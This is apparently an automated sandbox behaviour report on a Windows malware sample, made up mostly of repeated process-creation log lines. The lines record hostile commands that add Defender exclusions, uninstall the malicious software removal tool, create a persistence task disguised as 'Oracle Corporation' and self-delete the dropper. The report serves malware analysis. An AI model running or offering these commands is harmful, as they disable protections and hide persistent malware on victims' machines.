Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1704:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5448:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_03

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe

File created: C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml

Jump to behavior

Source: sE5IdDeTp2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\conhost.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: sE5IdDeTp2.exe	Virustotal: Detection: 40%
Source: sE5IdDeTp2.exe	ReversingLabs: Detection: 36%

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe

File read: C:\Users\user\Desktop\sE5IdDeTp2.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\sE5IdDeTp2.exe "C:\Users\user\Desktop\sE5IdDeTp2.exe"
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /delete /f /tn "Oracle Corporation"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\sE5IdDeTp2.exe"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /delete /f /tn "Oracle Corporation"	Jump to behavior
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"	Jump to behavior
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /run /tn "Oracle Corporation"	Jump to behavior
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\sE5IdDeTp2.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
